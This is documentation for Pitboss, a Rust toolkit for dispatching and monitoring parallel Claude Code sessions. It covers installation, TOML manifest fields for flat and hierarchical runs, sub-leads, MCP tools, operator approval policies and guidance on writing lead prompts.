Pitboss
Pitboss is a Rust toolkit for running and observing parallel Claude Code sessions. A dispatcher (pitboss) fans out claude subprocesses under a concurrency cap, captures structured artifacts per run, and — in hierarchical mode — lets a lead dynamically spawn more workers via MCP. The TUI (pitboss-tui) gives the floor view: tile grid, live log tailing, budget and token counters.
Language models are stochastic. A well-run pit is not.
What pitboss does
| Primitive | Description |
|---|---|
| Flat dispatch | Declare N tasks up front; pitboss runs them in parallel under a concurrency cap. Each task runs in its own git worktree on its own branch. |
| Hierarchical dispatch | Declare one lead; the lead observes the situation and dynamically spawns workers via MCP tools, under budget and worker-cap guardrails you set. |
| Depth-2 sub-leads | (v0.6+) A root lead may spawn sub-leads, each with its own envelope and isolated coordination layer. Useful for multi-phase projects that each need their own context. |
| Operator control | Cancel, pause, freeze, or reprompt workers live. Gate actions on operator approval. The TUI shows everything in real time. |
| Structured artifacts | Every run produces per-task logs, token usage, session ids, and a summary.json. Nothing disappears when the terminal closes. |
Quick orientation
- New to pitboss? Start with Install, then work through Your first dispatch.
- Want to understand when to use flat vs. hierarchical mode? See Flat vs. hierarchical.
- Looking for the full manifest field reference? See Manifest schema.
- Want to see it work? The Cookbook spotlights are runnable end-to-end examples.
- Writing a lead that needs MCP tools? See the MCP Tool Reference.
- Processing untrusted content or running in a security-sensitive context? See the Security section, starting with the Threat model and The Rule of Two.
Current version
v0.7.0 — headless-mode hardening:
- Bundled-claude container variant (ghcr.io/sds-mode/pitboss-with-claude).
- CLAUDE_CODE_ENTRYPOINT=sdk-ts permission default (closes the “silent 7-second success” sub-lead failure).
- ApprovalRejected / ApprovalTimedOut terminal states.
- spawn_sublead gains optional env and tools parameters.
- Dispatch-time TTY warning when approval gates are configured without an operator surface.
- pitboss agents-md subcommand + /usr/share/doc/pitboss/AGENTS.md in container images.
- Native multi-arch CI (62 min → 5 min); GHA action bumps for Node 24 compatibility.
See Changelog for the full version history.
Install
Pitboss ships two binaries: pitboss (the CLI dispatcher) and pitboss-tui (the terminal UI). Install both, or just pitboss if you don’t need the live floor view.
Via shell installer (recommended)
Releases are built with cargo-dist and include curl | sh installers. Each installer detects your platform, downloads the matching tarball, verifies its SHA-256, and drops the binary into ~/.cargo/bin.
curl -LsSf https://github.com/SDS-Mode/pitboss/releases/latest/download/pitboss-cli-installer.sh | sh
curl -LsSf https://github.com/SDS-Mode/pitboss/releases/latest/download/pitboss-tui-installer.sh | sh
pitboss version
pitboss-tui --version
Supported targets: x86_64-unknown-linux-gnu, aarch64-unknown-linux-gnu, aarch64-apple-darwin.
Via Homebrew
brew install SDS-Mode/pitboss/pitboss-cli
brew install SDS-Mode/pitboss/pitboss-tui
Formulae are auto-published to the SDS-Mode/homebrew-pitboss tap on every release.
Via container image
Published to GitHub Container Registry on every push to main and every release tag (linux/amd64 + linux/arm64):
podman pull ghcr.io/sds-mode/pitboss:latest
# Validate a manifest inside the container
podman run --rm -v "$(pwd)/pitboss.toml:/run/pitboss.toml" \
ghcr.io/sds-mode/pitboss:latest \
pitboss validate /run/pitboss.toml
Note: The image includes `git` (needed for worktree isolation) but does not include the `claude` binary. Mount your host’s Claude Code install or build a derived image that layers it in.
Direct tarball download
curl -L https://github.com/SDS-Mode/pitboss/releases/latest/download/pitboss-cli-x86_64-unknown-linux-gnu.tar.xz \
| tar xJ -C ~/.local/bin
Tarballs and SHA-256 checksums are attached to every GitHub release.
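Since checksums are published with each release, extraction can be gated on verification. A sketch using stand-in files (in a real install, both the tarball and checksums.txt come from the GitHub release assets):

```shell
# Verify a tarball against its checksum file before extracting.
# Files here are local stand-ins for the release assets.
workdir=$(mktemp -d)
cd "$workdir"
printf 'fake tarball bytes' > pitboss-cli-x86_64-unknown-linux-gnu.tar.xz
sha256sum pitboss-cli-x86_64-unknown-linux-gnu.tar.xz > checksums.txt
if sha256sum -c checksums.txt >/dev/null 2>&1; then
  result="checksum OK"   # safe to extract
else
  result="checksum MISMATCH"
fi
echo "$result"
```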
From source
git clone https://github.com/SDS-Mode/pitboss.git
cd pitboss
cargo install --path crates/pitboss-cli
cargo install --path crates/pitboss-tui
Shell completions
Both binaries emit completion scripts:
# bash
pitboss completions bash > ~/.local/share/bash-completion/completions/pitboss
pitboss-tui completions bash > ~/.local/share/bash-completion/completions/pitboss-tui
# zsh (adjust for your $fpath)
pitboss completions zsh > ~/.zsh/completions/_pitboss
pitboss-tui completions zsh > ~/.zsh/completions/_pitboss-tui
Fish, elvish, and powershell are also supported.
Prerequisites
- `claude` CLI — pitboss is a dispatcher on top of Claude Code. Install it from claude.ai/code and authenticate normally. No `ANTHROPIC_API_KEY` is required on Claude Code login systems.
- Git — required for worktree isolation (the default). Every task runs in its own `git worktree` on its own branch. Set `use_worktree = false` to skip this for read-only analysis runs.
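A quick preflight for both prerequisites, as a sketch; it only checks that the binaries are on PATH, not that claude is authenticated:

```shell
# Report whether each required binary is on PATH.
report=$(
  for bin in git claude; do
    if command -v "$bin" >/dev/null 2>&1; then
      echo "$bin: found"
    else
      echo "$bin: MISSING"
    fi
  done
)
echo "$report"
```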
Next step
→ Your first dispatch (flat mode)
Your first dispatch (flat mode)
Flat mode is the simplest way to use pitboss. You declare N tasks in a TOML manifest; pitboss fans them out in parallel, each in its own git worktree, and collects the results.
Write a manifest
Create pitboss.toml:
[run]
max_parallel = 2
[[task]]
id = "hello-a"
directory = "/path/to/your/repo"
prompt = "Write 'Hello from worker A' to a file called hello-a.txt at the repo root."
branch = "feat/hello-a"
[[task]]
id = "hello-b"
directory = "/path/to/your/repo"
prompt = "Write 'Hello from worker B' to a file called hello-b.txt at the repo root."
branch = "feat/hello-b"
Replace /path/to/your/repo with any git repository on your machine. The branch fields name the worktree branches pitboss will create. If you omit branch, pitboss auto-generates a name.
Validate first
Always validate before dispatching. This catches schema errors, missing directories, and semantic issues without spawning any claude processes:
pitboss validate pitboss.toml
Exit code 0 means the manifest is valid; on any error, pitboss prints the problem and exits non-zero.
Dispatch
pitboss dispatch pitboss.toml
Pitboss fans out both tasks in parallel (up to max_parallel = 2), streams progress to your terminal, and blocks until all tasks finish.
Exit codes:
- `0` — all tasks succeeded
- `1` — one or more tasks failed (pitboss itself ran cleanly)
- `2` — manifest error, missing `claude` binary, etc.
- `130` — interrupted (Ctrl-C; tasks drained gracefully)
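These codes make dispatch easy to wrap in CI. A sketch (the dispatch call is simulated with a stub so the branching is visible; substitute the real `pitboss dispatch pitboss.toml` invocation):

```shell
# Stub standing in for: pitboss dispatch pitboss.toml
run_dispatch() { return 1; }
run_dispatch
code=$?
case $code in
  0)   msg="all tasks succeeded" ;;
  1)   msg="some tasks failed; check summary.json" ;;
  2)   msg="manifest or environment error" ;;
  130) msg="interrupted" ;;
  *)   msg="unexpected exit code $code" ;;
esac
echo "$msg"
```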
Read the run artifacts
After dispatch, find the run directory:
RUN_DIR=$(ls -td ~/.local/share/pitboss/runs/*/ | head -1)
echo $RUN_DIR
The run directory contains:
| File | Contents |
|---|---|
| manifest.snapshot.toml | Exact manifest bytes used for this run |
| resolved.json | Fully resolved manifest (defaults applied) |
| meta.json | run_id, started_at, claude_version, pitboss_version |
| summary.json | Full structured summary written on clean finalize |
| summary.jsonl | Appended incrementally as tasks finish |
| tasks/<id>/stdout.log | Raw stream-JSON from the task’s claude subprocess |
| tasks/<id>/stderr.log | Stderr output |
Inspect the summary:
jq '.tasks[] | {id: .task_id, status: .status, tokens: .token_usage}' "$RUN_DIR/summary.json"
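For environments without jq, summary.jsonl (one record per finished task) can be grepped directly. The record shape below is a minimal assumption based on the fields listed above:

```shell
# Fabricated two-task summary.jsonl for illustration.
demo=$(mktemp)
cat > "$demo" <<'EOF'
{"task_id":"hello-a","status":"success"}
{"task_id":"hello-b","status":"failed"}
EOF
# Count records whose status is "failed".
failed=$(grep -c '"status":"failed"' "$demo")
echo "failed tasks: $failed"
```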
Watch the floor (optional)
Start pitboss-tui in another terminal while dispatch is running:
pitboss-tui
The TUI opens the most recent run automatically. Press ? for keybindings. Press Enter on a tile to open the Detail view with live log tailing. Press q to quit.
Attach to a single worker
pitboss attach <run-id> hello-a
Follow-mode log viewer for a single task. Run-id is resolved by prefix (first 8 chars of the UUID are enough when unique). Exits on Ctrl-C or when the worker finishes.
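Prefix resolution can be pictured as a glob over the runs directory; directory names below are illustrative UUIDs, and pitboss’s own matching may differ in detail:

```shell
# Two fake run directories; resolve one by its 8-char prefix.
runs=$(mktemp -d)
mkdir -p "$runs/3f9c2a1b-0000-4000-8000-000000000000" \
         "$runs/8a1d9e77-0000-4000-8000-000000000000"
prefix=3f9c2a1b
match=$(ls -d "$runs/$prefix"*/ | head -1)
echo "$match"
```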
Key manifest knobs for flat mode
| Field | Default | Notes |
|---|---|---|
| [run].max_parallel | 4 | How many tasks run concurrently |
| [run].halt_on_failure | false | Stop remaining tasks if any task fails |
| [run].worktree_cleanup | "on_success" | "always", "on_success", or "never" |
| [[task]].use_worktree | true | Set false for read-only analysis (no branch needed) |
| [[task]].timeout_secs | none | Per-task wall-clock cap |
| [[task]].model | see [defaults] | Per-task model override |
See Manifest schema for the full field reference.
Next step
→ Hierarchical dispatch with a lead
Hierarchical dispatch with a lead
Hierarchical mode hands a lead — a Claude session with MCP orchestration tools — a prompt and a set of guardrails, then lets it decide how many workers to spawn and in what order.
Use hierarchical mode when you’re describing a policy (“one worker per file in this directory”, “one worker per unique author”) rather than a fixed list of tasks.
A minimal hierarchical manifest
[run]
max_workers = 4
budget_usd = 2.00
lead_timeout_secs = 900
[defaults]
model = "claude-haiku-4-5"
use_worktree = false
[[lead]]
id = "digest"
directory = "/path/to/your/repo"
prompt = """
List the last 10 commits with:
git log --format='%H %an %s' -10
Group commits by author. For each unique author, spawn one worker via
mcp__pitboss__spawn_worker with a prompt to summarize that author's commits
in a file at /tmp/digest/<author-slug>.md.
Wait for all workers via mcp__pitboss__wait_for_worker.
Read each output file and write a combined /tmp/digest/SUMMARY.md.
Then exit.
"""
House rules
The three fields under [run] are the house rules — guardrails the lead must stay within:
| Field | Required | Meaning |
|---|---|---|
| max_workers | yes | Hard cap on concurrent + queued workers (1–16). |
| budget_usd | yes | Total spend envelope. Each spawn reserves a model-aware estimate; spawn_worker returns budget exceeded once the estimate would push over the cap. |
| lead_timeout_secs | no | Wall-clock cap on the lead itself. Defaults to 3600s. Set generously for multi-phase plans. |
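The reservation rule above can be sketched in plain arithmetic (numbers and units are illustrative, not pitboss’s internal representation):

```shell
# A spawn is rejected once spent + reserved + next_estimate > budget.
budget=200; spent=120; reserved=50; next_estimate=40   # cents, illustrative
if [ $((spent + reserved + next_estimate)) -gt "$budget" ]; then
  verdict="budget exceeded"
else
  verdict="spawn allowed"
fi
echo "$verdict"
```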
Validate and dispatch
pitboss validate pitboss.toml # prints a hierarchical summary when [[lead]] is set
pitboss dispatch pitboss.toml
What the lead can do
The lead’s --allowedTools is automatically populated with the full pitboss MCP toolset. The lead does not need to list them. Key tools:
| Tool | What it does |
|---|---|
| mcp__pitboss__spawn_worker | Spawn a worker with a prompt, optional directory/model/tools |
| mcp__pitboss__wait_for_worker | Block until a specific worker finishes |
| mcp__pitboss__wait_for_any | Block until the first of a list of workers finishes |
| mcp__pitboss__list_workers | Snapshot of all active and completed workers |
| mcp__pitboss__cancel_worker | Cancel a running worker |
| mcp__pitboss__pause_worker | Pause a worker (cancel-with-resume or SIGSTOP freeze) |
| mcp__pitboss__continue_worker | Resume a paused or frozen worker |
| mcp__pitboss__reprompt_worker | Mid-flight redirect with a new prompt |
| mcp__pitboss__request_approval | Gate an action on operator approval |
| mcp__pitboss__propose_plan | Submit a pre-flight plan for operator approval |
Workers also get the 7 shared-store tools (kv_get, kv_set, kv_cas, kv_list, kv_wait, lease_acquire, lease_release) for cross-worker coordination. See Coordination & state.
In the TUI
Lead tiles render with a ★ glyph and a cyan border. Workers spawned by the lead show a ▸ glyph and display ← <lead-id> on their bottom border. The status bar counts N workers spawned.
Depth-2 sub-leads (v0.6+)
If the job decomposes into orthogonal phases that each need their own clean context, a root lead can spawn sub-leads — each with its own budget envelope and coordination layer. Add allow_subleads = true to the [[lead]] block and use spawn_sublead instead of spawn_worker for the phase coordinators.
See Depth-2 sub-leads for the full model.
Resuming a hierarchical run
pitboss resume <run-id>
Re-dispatches the lead with --resume <session-id>. Workers are not individually resumed — the lead decides whether to spawn fresh workers. If the original run used worktree_cleanup = "on_success" (the default), set worktree_cleanup = "never" on runs you know you’ll want to resume.
Next steps
- Manifest schema — full field reference
- Flat vs. hierarchical — decision guide
- MCP Tool Reference — full tool signatures
Manifest schema
Pitboss manifests are TOML files, typically named pitboss.toml. A manifest is either flat (one or more [[task]] entries) or hierarchical (exactly one [[lead]] entry). The two are mutually exclusive.
Always validate before dispatching:
pitboss validate pitboss.toml
[run] — run-wide configuration
| Key | Type | Required? | Default | Notes |
|---|---|---|---|---|
| max_parallel | int | no | 4 | Flat mode: concurrency cap. Overridden by ANTHROPIC_MAX_CONCURRENT env. |
| halt_on_failure | bool | no | false | Flat mode: stop remaining tasks on first failure. |
| run_dir | string path | no | ~/.local/share/pitboss/runs | Where per-run artifacts land. |
| worktree_cleanup | "always" \| "on_success" \| "never" | no | "on_success" | What to do with each worker’s worktree after completion. Use "never" for inspection-heavy runs or when you plan to resume. |
| emit_event_stream | bool | no | false | Emit a JSONL event stream (pause/cancel/approval events) alongside summary.jsonl. |
| max_workers | int | if [[lead]] present | unset | Hierarchical: hard cap on concurrent + queued workers (1–16). |
| budget_usd | float | if [[lead]] present | unset | Hierarchical: soft cap with reservation accounting. spawn_worker fails with budget exceeded once spent + reserved + next_estimate > budget. |
| lead_timeout_secs | int | no | 3600 | Hierarchical: wall-clock cap on the lead. Set generously for multi-hour plans (e.g., 21600 for a 6-hour plan executor). |
| approval_policy | "block" \| "auto_approve" \| "auto_reject" | no | "block" | Hierarchical: how request_approval / propose_plan behave when no TUI is attached. |
| require_plan_approval | bool | no | false | Hierarchical (v0.5.0+): when true, spawn_worker refuses until a propose_plan call has been approved. |
| dump_shared_store | bool | no | false | Hierarchical: write shared-store.json into the run directory on finalize. |
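Taken together, a [run] block exercising the hierarchical keys above might look like this (values are illustrative):

```toml
[run]
max_workers = 8                 # hard cap on concurrent + queued workers
budget_usd = 5.00               # total spend envelope
lead_timeout_secs = 7200        # generous wall-clock cap for the lead
approval_policy = "block"       # hold approvals for the operator
require_plan_approval = true    # spawn_worker waits for an approved plan
emit_event_stream = true        # pause/cancel/approval events as JSONL
dump_shared_store = true        # write shared-store.json on finalize
```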
[defaults] — task/lead defaults
Inherited by every [[task]] and [[lead]] unless overridden at the task level.
| Key | Type | Notes |
|---|---|---|
| model | string | e.g., claude-haiku-4-5, claude-sonnet-4-6, claude-opus-4-7. Dated suffixes allowed. |
| effort | "low" \| "medium" \| "high" | Maps to claude --effort. |
| tools | array of string | --allowedTools value. Pitboss auto-appends its MCP tools for leads and workers. Default: ["Read", "Write", "Edit", "Bash", "Glob", "Grep"]. See Security → Defense-in-depth → Read-only lead pattern for guidance on restricting this per worker. |
| timeout_secs | int | Per-task wall-clock cap. No default (no cap). |
| use_worktree | bool | Default true. Set false for read-only analysis runs. |
| env | table | Env vars passed to the claude subprocess. |
[[task]] — flat mode (repeat for each task)
| Key | Required? | Notes |
|---|---|---|
| id | yes | Short slug. Alphanumeric + _ + -. Unique within manifest. Used in logs and worktree names. |
| directory | yes | Must be inside a git repo if use_worktree = true. |
| prompt | yes | Sent to the claude subprocess via -p. |
| branch | no | Worktree branch name. Auto-generated if omitted. |
| model, effort, tools, timeout_secs, use_worktree, env | no | Per-task overrides of [defaults]. |
[[lead]] — hierarchical mode (exactly one)
Same fields as [[task]]. The lead is a single Claude session that receives the MCP orchestration toolset. Mutually exclusive with [[task]].
Additional fields on [[lead]] for depth-2 sub-leads (v0.6+):
| Key | Type | Notes |
|---|---|---|
| allow_subleads | bool | Default false. Set true to expose spawn_sublead to the root lead. |
| max_subleads | int | Optional cap on total sub-leads spawned. |
| max_sublead_budget_usd | float | Optional cap on the per-sub-lead budget_usd envelope. |
| max_workers_across_tree | int | Optional cap on total live workers across all sub-trees. |
[lead.sublead_defaults]
Optional defaults for sub-leads spawned via spawn_sublead. Any field omitted in the spawn_sublead call falls back to these values.
| Key | Type |
|---|---|
| budget_usd | float |
| max_workers | int |
| lead_timeout_secs | int |
| read_down | bool |
[[approval_policy]] — declarative approval rules (v0.6+)
Zero or more policy blocks, evaluated in order. First matching rule wins.
[[approval_policy]]
match = { actor = "root→S1", category = "tool_use" }
action = "auto_approve"
[[approval_policy]]
match = { category = "plan" }
action = "block"
Match fields (all optional; unset fields always match):
| Field | Type | Notes |
|---|---|---|
| actor | string | Actor path, e.g., "root→S1" or "root→S1→W3". |
| category | string | "tool_use", "plan", "cost", etc. |
| tool_name | string | Specific MCP tool name. |
| cost_over | float | Fires when the request’s cost_estimate exceeds this value (USD). |
Actions: "auto_approve", "auto_reject", "block" (forces operator review).
Rules are evaluated in pure Rust — deterministic, fast, never LLM-evaluated.
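First-match-wins over the two example rules above can be sketched in shell as a stand-in for the Rust evaluator; the final fallback to operator review is an assumption based on the default approval_policy = "block":

```shell
# Incoming request fields (illustrative).
actor="root→S1"; category="tool_use"
if [ "$actor" = "root→S1" ] && [ "$category" = "tool_use" ]; then
  action="auto_approve"   # rule 1 matches; later rules are not consulted
elif [ "$category" = "plan" ]; then
  action="block"          # rule 2
else
  action="block"          # no rule matched: assume operator review
fi
echo "$action"
```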
Annotated example
The pitboss.example.toml in the repository root has every field annotated with usage notes. It is a good starting point for new manifests.
Run artifacts
After dispatch, the run directory (~/.local/share/pitboss/runs/<run-id>/) contains:
| File | Contents |
|---|---|
| manifest.snapshot.toml | Exact manifest bytes used |
| resolved.json | Fully resolved manifest (defaults applied) |
| meta.json | run_id, started_at, claude_version, pitboss_version |
| summary.json | Full structured summary (written on clean finalize) |
| summary.jsonl | Incremental task records as they finish |
| tasks/<id>/stdout.log | Raw stream-JSON from the task’s subprocess |
| tasks/<id>/stderr.log | Stderr |
| lead-mcp-config.json | Hierarchical only: the --mcp-config pointing at the MCP bridge |
| shared-store.json | Hierarchical only: written when dump_shared_store = true |
Flat vs. hierarchical mode
Pitboss has two dispatch modes. Choosing the right one before writing a manifest saves significant rework.
Decision table
| Question | Answer → Mode |
|---|---|
| Can you enumerate every task before running? | Flat |
| Does the decomposition depend on what you find at runtime? | Hierarchical |
| Do you need budget enforcement? | Hierarchical |
| Is the work purely parallel with no coordination? | Flat |
| Does the lead need to observe partial results and decide next steps? | Hierarchical |
| Do sub-tasks need a shared coordination surface (KV store, leases)? | Hierarchical |
Side-by-side comparison
| | Flat | Hierarchical |
|---|---|---|
| Tasks declared | Statically, in the manifest | Dynamically, by the lead at runtime |
| Number of workers | Fixed (N [[task]] entries) | Dynamic, bounded by max_workers |
| Budget enforcement | None | Yes, via budget_usd + reservation accounting |
| MCP server | Not started | Yes, unix socket; auto-bridged to lead |
| Cross-worker state | None | Shared KV store + leases |
| Operator approvals | Not available | Available via request_approval / propose_plan |
| Lead can be paused/redirected | N/A | Yes, via TUI or MCP tools |
| Resume semantics | Each task resumes individually | Only the lead resumes; lead re-decides worker strategy |
When to use flat mode
- You can write out every `[[task]]` before running.
- The tasks are independent — each one doesn’t need the output of another.
- You want the simplest possible setup with no MCP overhead.
- You’re running read-only analysis where every target is known up front.
[run]
max_parallel = 3
[defaults]
model = "claude-haiku-4-5"
use_worktree = false
[[task]]
id = "summarize-a"
directory = "/path/to/repo"
prompt = "Summarize file-a.txt into one sentence. Write to /tmp/summaries/a.md."
[[task]]
id = "summarize-b"
directory = "/path/to/repo"
prompt = "Summarize file-b.txt into one sentence. Write to /tmp/summaries/b.md."
When to use hierarchical mode
- You’re describing a policy: “one worker per file in this directory”, “one worker per unique author”.
- The decomposition depends on what the lead finds when it starts running.
- You want a budget cap to protect against runaway spending.
- You want the lead to observe partial results and make decisions (e.g., spawn more workers if initial results look incomplete, or skip remaining work after a budget hit).
[run]
max_workers = 6
budget_usd = 1.50
lead_timeout_secs = 1200
[defaults]
model = "claude-haiku-4-5"
use_worktree = false
[[lead]]
id = "author-digest"
directory = "/path/to/repo"
prompt = """
List the last 20 commits with `git log --format='%H %an %s' -20`. Group by author.
Spawn one worker per unique author via mcp__pitboss__spawn_worker to summarize
that author's work in /tmp/digest/<author-slug>.md. Wait for all, then compose
/tmp/digest/SUMMARY.md.
"""
Rule of thumb
If the operator can write out every `[[task]]` before running, use flat. If the operator is describing a policy, use hierarchical.
When to use depth-2 sub-leads
Depth-2 sub-leads (v0.6+) add a third tier: a root lead may spawn sub-leads, each running their own workers with their own envelope and isolated coordination layer.
Use sub-leads when:
- The project decomposes into orthogonal phases that each need their own clean Claude context.
- Different phases have meaningfully different budget requirements.
- You want to prevent one phase from observing another’s intermediate state.
Do not use sub-leads for every multi-worker job. Plain workers are cheaper to coordinate; sub-leads add MCP round-trips and context switching overhead. Add sub-leads only when the context isolation benefit is worth it.
See Depth-2 sub-leads for the full model.
Depth-2 sub-leads
Added in v0.6.0.
Pitboss normally allows a single level of nesting: a root lead spawning workers. Depth-2 sub-leads add one more tier — a root lead may spawn sub-leads, each of which spawns workers. Workers remain terminal: they cannot spawn anything.
When to use sub-leads
Use sub-leads when the root lead’s plan decomposes into orthogonal phases that each need their own clean Claude context. For example:
- Phase 1 gathers inputs; Phase 2 processes them — they don’t share implementation state, so keeping them in separate contexts avoids prompt pollution.
- Different phases have meaningfully different budget requirements.
- You want to prevent one phase from reading another’s intermediate work (strict-tree isolation is the default).
Do not use sub-leads for every multi-worker job. Plain workers are cheaper and simpler. Add sub-leads only when context isolation is worth the overhead.
Manifest
Enable sub-leads by setting allow_subleads = true on the [[lead]] block:
[run]
max_workers = 20
budget_usd = 20.00
lead_timeout_secs = 7200
[[lead]]
id = "root"
allow_subleads = true
max_subleads = 4
max_sublead_budget_usd = 5.00
max_workers_across_tree = 16
directory = "/path/to/repo"
prompt = """
Decompose this project into phases. For each phase, spawn a sub-lead with
its own budget and a focused prompt via spawn_sublead. Wait for all sub-leads
via wait_actor. Synthesize the results.
"""
[lead.sublead_defaults]
budget_usd = 2.00
max_workers = 4
lead_timeout_secs = 1800
read_down = false
[[lead]] fields for sub-leads
| Field | Default | Notes |
|---|---|---|
| allow_subleads | false | Required to expose spawn_sublead to the root lead. |
| max_subleads | none | Optional cap on total sub-leads spawned across the run. |
| max_sublead_budget_usd | none | Cap on the per-sub-lead budget_usd envelope. Spawn attempts exceeding this fail fast before any state is mutated. |
| max_workers_across_tree | none | Cap on total live workers (root + all sub-trees). |
[lead.sublead_defaults]
Optional defaults inherited by spawn_sublead calls that omit those parameters.
spawn_sublead MCP tool
Available only to the root lead when allow_subleads = true.
spawn_sublead(
prompt: string,
model: string,
budget_usd: float,
max_workers: u32,
lead_timeout_secs?: u64,
initial_ref?: { [key: string]: any },
read_down?: bool,
)
→ { sublead_id: string }
- `initial_ref` — optional key-value snapshot seeded into the sub-lead’s `/ref/*` namespace at spawn time. Use it to pass shared configuration (e.g., target file paths, conventions, task list) without requiring the sub-lead to make a separate `kv_get` call.
- `read_down` — when `true`, the root lead can observe the sub-tree’s KV store. Default `false` (strict-tree isolation).
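A call shaped like this signature might look as follows; every value is illustrative:

```
spawn_sublead(
  prompt = "Phase 1: inventory the public API surface and write findings to /tmp/api/endpoints.md. Spawn one worker per module.",
  model = "claude-sonnet-4-6",
  budget_usd = 2.00,
  max_workers = 4,
  initial_ref = { "output_dir": "/tmp/api" },
  read_down = false,
)
```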
wait_actor MCP tool
wait_actor generalizes wait_for_worker to accept any actor id — worker or sub-lead:
wait_actor(actor_id: string, timeout_secs?: u64)
→ ActorTerminalRecord
wait_for_worker is retained as a back-compat alias and continues to work for worker ids.
Authorization model
| Access | Default behavior |
|---|---|
| Root reads into sub-tree | Blocked. Pass read_down = true at spawn_sublead to allow. |
| Sub-lead reads into sibling sub-tree | Always blocked. |
| Peer visibility within a layer | Each /peer/<X>/* is readable only by X itself, that layer’s lead, or the operator via TUI. Workers within a sub-tree do not see each other’s peer slots. |
| Operator (TUI) | Super-user across all layers, regardless of read_down. |
Approval routing
All approval requests — from any layer — route to the operator via the TUI approval list pane. The root lead is not an approval authority. Use [[approval_policy]] rules to auto-approve routine requests before they reach the operator queue.
See Approvals for the full policy model.
Kill-with-reason
cancel_worker(target, reason) — when invoked with a reason string, a synthetic [SYSTEM] reprompt is delivered to the killed actor’s direct parent lead. This lets the parent adapt without a separate reprompt_worker round-trip:
- Kill a worker → its sub-lead (or root lead) receives the reason.
- Kill a sub-lead → the root lead receives the reason.
Cancel cascade
When the operator cancels a run (via TUI X or Ctrl-C), cancellation propagates depth-first through the entire tree: root → each sub-lead → each sub-lead’s workers. No straggler processes are left running.
TUI presentation
In the TUI, sub-trees render as collapsible containers. The container header shows the sublead_id, a budget bar, worker count, approval badge, and read_down indicator. Tab cycles focus across containers; Enter on a header toggles expand/collapse.
Run-global leases for cross-tree coordination
Per-layer /leases/* KV namespaces are isolated per sub-tree. For resources that span sub-trees (e.g., a path on the operator’s filesystem), use the run-global lease API:
run_lease_acquire(key: string, ttl_secs: u32) → { lease_id, version }
run_lease_release(lease_id: string) → { ok: true }
See Leases & coordination for guidance on when to use /leases/* vs run_lease_*.
Writing effective leads
A lead prompt is the strategic layer of a hierarchical run: it tells Claude what to do as an orchestrator, not as a performer. Getting this right is the single highest-leverage thing you can do to improve run reliability. This page covers the patterns that make lead prompts work well, the anti-patterns that don’t, and ends with a complete annotated example you can adapt.
What a lead actually does
A lead is a Claude session that receives the orchestration MCP toolset — spawn_worker, wait_actor, request_approval, kv_set, and the rest. The prompt sets the strategy; the tools enact it. The important detail: Claude’s default behavior is to do work itself. Given a task and the ability to read files, Claude will read files. You have to actively counter this tendency and push it toward delegation — otherwise you’ll get a lead that solves the whole problem in-context and spawns nothing, which defeats the purpose of using hierarchical mode at all.
The decomposition framing
The opening of a lead prompt should explicitly state that the lead’s job is coordination, not execution. Left implicit, models default to monolithic execution — they complete the work themselves and never invoke spawn_worker.
What good decomposition framing contains:
- An explicit non-execution instruction. “Your job is to coordinate. Do NOT do the work yourself.”
- A concrete decomposition heuristic. The lead needs to know when to spawn. Vague instructions (“spawn workers as needed”) produce unpredictable behavior. Name the decomposition axis: “one worker per file”, “one worker per phase”, “one worker per unique dependency”.
- Worker invocation parameters spelled out. Specify which model, budget, tools, and prompt template each worker should receive. Leaving these open-ended produces inconsistent workers.
- An explicit wait instruction naming the tool. Don’t assume the lead knows to call `wait_actor`; say “after spawning all workers, call `wait_actor` on each one before proceeding.”
- A summary instruction at the end. Without it, leads often end with conversational filler rather than a structured result.
Anti-pattern — too vague:
Audit the security headers for each URL in /tmp/urls.txt. Spawn workers as needed.
This prompt doesn’t tell the lead when to spawn, what the workers should do, or what to produce. Most models will just process the URLs themselves.
Better:
Your job is to COORDINATE, not to do the work yourself.
For each URL in /tmp/urls.txt, spawn exactly one worker via spawn_worker.
Workers should use model = "claude-sonnet-4-6", budget = 0.20.
After spawning all workers, call wait_actor on each worker_id before continuing.
When all workers have finished, produce a final report (see "Final report" below).
Worker prompt templates
The lead writes worker prompts at runtime. If you don’t teach it a template, it will improvise — and inconsistent worker prompts produce inconsistent worker outputs that are hard to aggregate.
Teach the lead a template in the lead prompt itself:
Spawn each worker using this exact prompt template (substitute [URL] and [WORKER_N]):
"You are WORKER_N. Fetch [URL] and check the following security headers:
Content-Security-Policy, X-Frame-Options, Strict-Transport-Security.
Produce a report with exactly three sections:
1. FOUND: headers that are present and their values
2. MISSING: headers that are absent
3. RECOMMENDATION: one sentence per missing header
Keep the report under 400 words. Do not include any other content."
Why templates matter: free-form worker prompts lead to workers that structure their output differently — some use prose, some use tables, some omit sections entirely. The lead then can’t reduce the results cleanly. A template enforces the shape of each worker’s output and makes the lead’s aggregation step deterministic.
Handling partial results
Workers fail. They time out, hit context limits, or return error messages. A lead without explicit instructions for this case will often stall, retry indefinitely, or crash.
Three patterns — pick one and name it in the prompt:
Fail-fast: Any worker failure cancels remaining work and reports aggregate failure. Use when work is sequential or when partial results are useless.
If any worker returns an error or times out, do NOT spawn additional workers.
Collect the errors and produce a final report listing which inputs failed and why.
Best-effort: Collect what completes, note what didn’t, exit cleanly. Use when work is independent (e.g., one worker per file — a failed file audit doesn’t affect the others).
If a worker returns an error, record the failure and continue with the remaining workers.
Do not retry failed workers. In the final report, list which inputs were successfully
processed and which were not, with the error reason for each failure.
Retry-on-failure: Respawn with a corrected prompt up to N times. Use when failures are typically transient (network, race conditions, intermittent tool errors).
If a worker returns an error, inspect the error. If it appears transient (network timeout,
tool unavailable), respawn that worker once with the same prompt. If it fails again,
treat it as a permanent failure and record it as such. Do not retry more than once per input.
Name the pattern explicitly in your prompt. Don’t rely on the lead to infer the right behavior from context.
Graceful budget exhaustion
Leads spawn workers that consume budget. When budget_usd runs low, spawn_worker returns a budget exceeded error. Without explicit handling instructions, leads either crash on this error or retry the spawn indefinitely — both bad outcomes.
The instruction to add:
You have a budget of $X for this run. Before each spawn_worker call, estimate whether
you have enough remaining budget to complete the current worker plus any workers you
still need to spawn. If you don't, stop spawning new workers immediately. Produce a
final report listing what was completed and what was deferred due to budget exhaustion.
The same pattern applies to the other resource limits:
- `max_workers` cap: “If `spawn_worker` returns `max_workers exceeded`, wait for a running worker to complete before spawning the next one.”
- `lead_timeout_secs`: “If you have fewer than 5 minutes remaining on your wall-clock limit, stop spawning and produce your final report with what has completed so far.”
Without these instructions, budget and concurrency caps become crash sites rather than graceful stopping points.
The summary instruction
A lead’s final assistant message becomes the final_message_preview field of the TaskRecord. This is what shows up in the TUI after the run, in notifications, and in summary.json during post-run inspection. Without an explicit instruction to produce a structured summary, leads often end with phrases like “Let me know if you need anything else” — which tells the operator nothing.
